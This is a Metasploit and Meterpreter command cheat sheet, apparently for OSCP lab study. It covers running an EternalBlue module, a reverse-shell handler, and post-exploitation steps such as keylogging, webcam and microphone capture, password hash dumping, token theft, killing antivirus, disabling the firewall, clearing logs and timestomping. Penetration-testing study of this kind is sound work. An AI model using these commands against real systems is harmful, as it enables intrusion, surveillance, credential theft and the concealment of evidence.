metasploit&meterpreter

See Metasploit Unleashed Course

Search for exploits using Metasploit GitHub framework source code: https://github.com/rapid7/metasploit-framework Translate them for use on OSCP LAB or EXAM.

Metasploit MetaSploit requires Postfresql systemctl start postgresql

To enable Postgresql on startup systemctl enable postgresql

MSF Syntax Start metasploit msfconsole msfconsole -q

Show help for command show -h

Show Auxiliary modules show auxiliary

Use a module use auxiliary/scanner/snmp/snmp_enum use auxiliary/scanner/http/webdav_scanner use auxiliary/scanner/smb/smb_version use auxiliary/scanner/ftp/ftp_login use exploit/windows/pop3/seattlelab_pass

Show the basic information for a module info

Show the configuration parameters for a module show options

Set options for a module set RHOSTS 192.168.1.1-254 set THREADS 10

Run the module run

Execute an Exploit exploit

Search for a module search type:auxiliary login

Metasploit Database Access Show all hosts discovered in the MSF database hosts

Scan for hosts and store them in the MSF database db_nmap

Search machines for specific ports in MSF database services -p 443

Leverage MSF database to scan SMB ports (auto-completed rhosts) services -p 443 --rhosts

You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video:

1. First step is to configure the Kali to work with wine 32bit

dpkg --add-architecture i386 && apt-get update && apt-get install wine32 rm -r ~/.wine wine cmd.exe exit

1. Download the exploit repostory https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

2. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb

3. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)

use exploit/windows/smb/eternalblue_doublepulsar msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10 RHOST => 10.11.1.73 msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe PROCESSINJECT => spoolsv.exe msf exploit(eternalblue_doublepulsar) > run

Experimenting with Meterpreter

Get system information from Meterpreter Shell sysinfo

Get user id from Meterpreter Shell getuid

Search for a file search -f *pass*.txt

Upload a file upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec

Download a file download c:\\Windows\\system32\\calc.exe /tmp/calc.exe

Invoke a command shell from Meterpreter Shell shell

Exit the meterpreter shell exit

Metasploit Exploit Multi Handler multi/handler to accept an incoming reverse_https_meterpreter

payload use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST $ip set LPORT 443 exploit [*] Started HTTPS reverse handler on https://$ip:443/ Building Your Own MSF Module mkdir -p ~/.msf4/modules/exploits/linux/misc cd ~/.msf4/modules/exploits/linux/misc cp /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb ./crossfire.rb nano crossfire.rb

Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities) - download Download a file or directory upload Upload a file or directory portfwd Forward a local port to a remote service route View and modify the routing table keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes screenshot Grab a screenshot of the interactive desktop record_mic Record audio from the default microphone for X seconds webcam_snap Take a snapshot from the specified webcam getsystem Attempt to elevate your privilege to that of local system. hashdump Dumps the contents of the SAM database

---

Baisc system commands

background # placed in the background of the current session Sessions # Sessions to see -h help sessions -i # kill -k session into the session bgrun / RUN # implementation of the existing module, double-click the tab enter the run, has been listed Some scripts info # View existing module information getuid # View current user identity getprivs # View current user permissions getpid # Get current process ID (PID) sysinfo # View target machine system information irb # Open ruby terminal ps # View is running Process
kill # Kill the specified PID process idletime # View target idle time reboot / shutdown # Restart / Shutdown shell # Enter target cmd shell

Common cmd commands

Whoami # Current privilege quser # Query current online administrator net user # View existing user net user username/password/add # Add user and corresponding password net localgroup User group name username/add # Add the specified user to the specified user group netstat -ano # Query the current network connection communication in the computer, LISTENING indicates that the port is in the listening state; ESTABLISHED indicates that the port is in the working (communication) state systeminfo # View the details of the current computer tasklist /svc # View each process corresponding to services taskkill / f / im program name # name of the end of a specified program taskkill / f / PID ID # end of a specified process PID tasklist | findstr "string" # Find content specified output logoff # cancellation of a Specify the user's ID shutdown -r # Restart the current computer netsh adcfirewall setAllprofiles state off # Turn off the firewall

Uictl switch keyboard / mouse

Uictl [ enable/disable ] [ keyboard/mouse/all ] # enable or disable keyboard/mouse uictl disable mouse # disable mouse uictl disable keyboard # disable keyboard

Execute executable file

the Execute # executable file on the target machine execute -H -i -f cmd.exe create a new process cmd.exe #, -H invisible, -i interactive execute -H -m -d notepad.exe -f payload.exe - a "-o hack.txt"

-d Process name displayed during execution of the target host (for masquerading) -m Direct execution from memory

"-o hack.txt" is the running parameter of payload.exe

Migrate process migration

Getpid # Get the current process's pid ps # View the current active process migrate # Migrate the Meterpreter session to the specified pid value in the process kill #kill the process

Clearav clear log

Clearav # Clear application logs, system logs, security logs in windows

Timestomp forged timestamp

Timestomp C: \ -h
View help timestomp -v C: \ 2 .txt
View timestamp timestomp C: \ 2 .txt -f C: \ 1 .txt #Copy the timestamp of 1.txt Give 2. txt timestomp c: \ test \ 22 .txt -z "03/10/2019 11:55:55" -v # Set the four properties to uniform time

Portfwd port forwarding

Portfwd add -l 1111 -p 3389 -r 127 .0.0.1 #Forward the 3389 port of the target machine to the local port 1111 rdesktop 127 .0.0.1:1111 # Need to enter the username and password to connect rdesktop -u Administrator -p 123 127 .0.0.1:1111 # -u username -p password

Autoroute add route

run autoroute -h # View help run get_local_subnets # View target intranet segment address run autoroute -s 192 .168.183.0/24 # Add target network segment route run autoroute -p # View added route run post/windows/gather/arp_scanner RHOSTS = 192 .168.183.0/24 run auxiliary/scanner/portscan/tcp RHOSTS = 192 .168.183.146 PORTS = 3389

Socks agent

Reference: https://www.freebuf.com/articles/network/125278.html use auxiliary/server/socks4a set srvhost 127 .0.0.1 set srvport 2000 run

Common script

Run arp_scanner -r 192 .168.183.1/24 # Use arp for surviving host scan run winenum # automate some detection scripts run credcollect # get user hash run domain_list_gen # get domain management account list run post/multi/gather/env # get User environment variable run post/windows/gather/enum_logged_on_users -c # List current login user run post/linux/gather/checkvm # virtual machine run post/windows/gather/checkvm # virtual machine run post/windows/gather/ Forensics/enum_drives # View memory information run post/windows/gather/enum_applications # Get installation software information run post/windows/gather/dumplinks # Get recently accessed documents, link information run post/windows/gather/enum_ie # Get IE cache run post/windows/gather/enum_firefox # Get firefox cache run post/windows/gather/enum_chrome # Get Chrome cache run post/multi/recon/local_exploit_suggester # Get local privilege vulnerability run post/windows/gather/enum_patches # Get patch information run post/windows/gather/enum_domain # Find domain control run post/windows/gather/enum_snmp # Get snmp community name run post/windows/gather/credentials/vnc # Get vnc password run post/windows/wlan/ Wlan_profile # Used to read the target host WiFi password run post/multi/gather/wlan_geolocate # Based on wlan, the location confirmation file is located at /root/.msf4/loot run post/windows/manage/killav close antivirus software

Common crack module

Auxiliary/scanner/mssql/mssql_login Auxiliary/scanner/ftp/ftp_login Auxiliary/scanner/ssh/ssh_login Auxiliary/scanner/telnet/telnet_login Auxiliary/scanner/smb/smb_login Auxiliary/scanner/mssql/mssql_login Auxiliary/scanner/mysql/mysql_login Auxiliary/scanner/oracle/oracle_login Auxiliary/scanner/postgres/postgres_login Auxiliary/scanner/vnc/vnc_login Auxiliary/scanner/pcanywhere/pcanywhere_login Auxiliary/scanner/snmp/snmp_login Auxiliary/scanner/ftp/anonymous

Keylogger

Keyscan_start # Start key record keyscan_dump # Export record data keyscan_stop # End key record

Sniffer capture package

Use sniffer Sniffer_interfaces # View NIC sniffer_start 1 # Select NIC 1 to start capturing sniffer_stats 1 # View NIC 1 status sniffer_dump 1 /tmp/wlan1.pcap # Export pcap packet sniffer_stop 1 # Stop NIC 1 capture sniffer_release 1 # Release NIC 1 traffic

Webcam

record_mic　 # audio recording webcam_chat # open a video chat (the other party pop) webcam_list # view camera webcam_snap # through the camera to take pictures webcam_stream # open by video surveillance cameras (to monitor ≈ live as a web page)

Screen capture

Screenshot # Screenshots use espia # Use espia module screengrab # screenshot

Getgui command

run getgui –h # View help run getgui -e # Open remote desktop run getgui -u admin -p admin # Add user run getgui -f 6666 -e # 3389 port forward to 6666

---

CORE COMMANDS

? - help menu background - moves the current session to the background bgkill - kills a background meterpreter script bglist - provides a list of all running background scripts bgrun - runs a script as a background thread channel - displays active channels close - closes a channel exit - terminates a meterpreter session help - help menu interact - interacts with a channel irb - go into Ruby scripting mode migrate - moves the active process to a designated PID quit - terminates the meterpreter session read - reads the data from a channel run - executes the meterpreter script designated after it use - loads a meterpreter extension write - writes data to a channel

FILE SYSTEM COMMANDS

cat - read and output to stdout the contents of a file cd - change directory on the victim del - delete a file on the victim download - download a file from the victim system to the attacker system edit - edit a file with vim getlwd - print the local directory getwd - print working directory lcd - change local directory lpwd - print local directory ls - list files in current directory mkdir - make a directory on the victim system pwd - print working directory rm - delete a file rmdir - remove directory on the victim system upload - upload a file from the attacker system to the victim

NETWORK COMMANDS

ipconfig - displays network interfaces with key information including IP address, etc. portfwd - forwards a port on the victim system to a remote service route - view or modify the victim routing table

SYSTEM COMMANDS

clearav - clears the event logs on the victim's computer drop_token - drops a stolen token execute - executes a command getpid - gets the current process ID (PID) getprivs - gets as many privileges as possible getuid - get the user that the server is running as kill - terminate the process designated by the PID ps - list running processes reboot - reboots the victim computer reg - interact with the victim's registry rev2self - calls RevertToSelf() on the victim machine shell - opens a command shell on the victim machine shutdown - shuts down the victim's computer steal_token - attempts to steal the token of a specified (PID) process sysinfo - gets the details about the victim computer such as OS and name

User Interface Commands

enumdesktops - lists all accessible desktops getdesktop - get the current meterpreter desktop idletime - checks to see how long since the victim system has been idle keyscan_dump - dumps the contents of the software keylogger keyscan_start - starts the software keylogger when associated with a process such as Word or browser keyscan_stop - stops the software keylogger screenshot - grabs a screenshot of the meterpreter desktop set_desktop - changes the meterpreter desktop uictl - enables control of some of the user interface components

PRIVILAGE ESCALATION COMMANDS

getsystem - uses 15 built-in methods to gain sysadmin privileges

PASSWORD DUMP COMMAND

hashdump - grabs the hashes in the password (SAM) file

TIMESTOMP COMMAND

timestomp - manipulates the modify, access, and create attributes of a file